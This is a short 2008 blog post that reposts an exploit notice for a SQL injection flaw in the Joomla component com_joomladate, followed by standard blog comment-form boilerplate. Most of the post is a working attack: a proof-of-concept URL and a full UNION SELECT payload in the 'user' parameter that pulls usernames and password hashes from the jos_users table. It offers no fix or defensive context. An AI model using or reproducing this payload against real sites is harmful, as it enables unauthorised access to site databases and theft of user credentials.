Joomladate Remote SQL injection
June 7, 2008

Author : His0k4 [ALGERIAN HaCkEr]
POC : http://localhost/[Joomla_Path]/index.php?option=com_joomladate&task=viewProfile&user={SQL}
Example :
http://localhost/[Joomla_Path]/index.php?option=com_joomladate&task=viewProfile&user=9999999 UNION SELECT user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user() FROM jos_users--

Posted in IT Things, Sec. Things |


Spread Firefox Affiliate Button
Bookmark and Share
Page copy protected against web site content infringement by Copyscape



Comments »

The URI to TrackBack this entry is: http://spikecursed.blogsome.com/2008/06/07/joomladate-remote-sql-injection/trackback/

No comments yet.

RSS feed for comments on this post.

Leave a comment

Line and paragraph breaks automatic, e-mail address never displayed, HTML allowed: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>



Anti-spam measure: please retype the above text into the box provided.